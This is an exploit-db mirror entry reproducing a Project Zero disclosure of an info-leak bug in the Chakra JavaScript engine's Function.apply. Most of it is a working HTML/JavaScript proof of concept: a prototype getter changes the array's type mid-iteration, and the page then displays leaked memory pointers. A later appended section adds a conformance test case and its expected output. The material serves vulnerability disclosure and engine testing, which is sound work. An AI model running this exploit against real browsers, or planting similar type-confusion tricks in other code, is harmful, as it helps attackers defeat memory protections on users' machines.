exploit-db-mirror/platforms/windows/dos/40603.html
Offensive Security 07fdc778ee DB: 2016-10-21
2016-10-21 05:01:17 +00:00

84 lines
1.7 KiB
HTML
Executable file

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=920
When Function.apply is called in Chakra, the parameter array is iterated through using JavascriptArray::ForEachItemInRange. This function accepts a templated parameter, hasSideEffect, that allows the function to behave safely in the case that iteration has side effects. In JavascriptFunction::CalloutHelper (which is called by Function.apply) this parameter is set to false, even though iterating through the array can have side effects. This can cause an info leak if the side effects cause the array to change types from a numeric array to a variable array. A PoC is as follows and attached. Running this PoC causes an alert dialog with pointers in it.

var t = new Array(1,2,3);
function f(){
    var h = [];
    var a = [...arguments];
    for (var item in a) {
        var n = new Number(a[item]);
        if (n < 0) {
            n = n + 0x100000000;
        }
        h.push(n.toString(16));
    }
    alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
    get: function() {
        var ta = [];
        ta.fill.call(t, "natalie");
        return 5;
    }
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
-->
<html><body><script>
var t = new Array(1,2,3);
function f(){
    // Spread the received arguments into a fresh array and render each one
    // in hex; after the type confusion, these values are leaked pointers.
    var h = [];
    var a = [...arguments];
    for (var item in a) {
        var n = new Number(a[item]);
        if (n < 0) {
            n = n + 0x100000000;
        }
        h.push(n.toString(16));
    }
    alert(h);
}
var q = f;
// Extend the array so apply() iterates past the three stored elements;
// the missing indices are resolved through the prototype chain.
t.length = 20;
var o = {};
// The getter for index 3 runs in the middle of the iteration and rewrites
// t from a numeric array into a var array, which the loop does not expect.
Object.defineProperty(o, '3', {
    get: function() {
        var ta = [];
        ta.fill.call(t, "natalie");
        return 5;
    }
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
</script></body></html>
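As an added example (not part of the Project Zero report or its PoC), the following shows what a spec-conformant engine must produce for the same sequence: the index-3 getter fires once during Function.apply's argument iteration, and every element read after it reflects the mutation. The helper names `buildArgumentList` and `capturedArguments` are mine; the accessor gets a no-op setter because ECMAScript's Array.prototype.fill uses Set with throw=true and would otherwise raise a TypeError at the getter-only index 3.

```javascript
// Constructed test case: a sparse array whose prototype getter rewrites the
// array while Function.apply is still reading it. A correct engine re-reads
// each element through the generic path, so the mutation is visible to the
// callee instead of leaking stale backing-store contents.
function buildArgumentList() {
  var t = [1, 2, 3];
  t.length = 20;                 // indices 3..19 are holes, resolved via proto
  var getterCalls = 0;
  var proto = {};
  Object.defineProperty(proto, '3', {
    get: function () {
      getterCalls++;
      // Side effect in the middle of iteration: every slot of t becomes a
      // string, changing the array from numeric to generic storage.
      Array.prototype.fill.call(t, 'natalie');
      return 5;
    },
    set: function () {}          // lets fill() pass index 3 without throwing
  });
  Object.setPrototypeOf(t, proto);
  return { t: t, calls: function () { return getterCalls; } };
}

// Capture exactly what the callee receives from Function.apply.
function capturedArguments() {
  var built = buildArgumentList();
  var seen = (function () { return Array.prototype.slice.call(arguments); })
             .apply(null, built.t);
  return { seen: seen, getterCalls: built.calls() };
}
```

The expected result is [1, 2, 3, 5] followed by sixteen copies of "natalie", with the getter invoked exactly once.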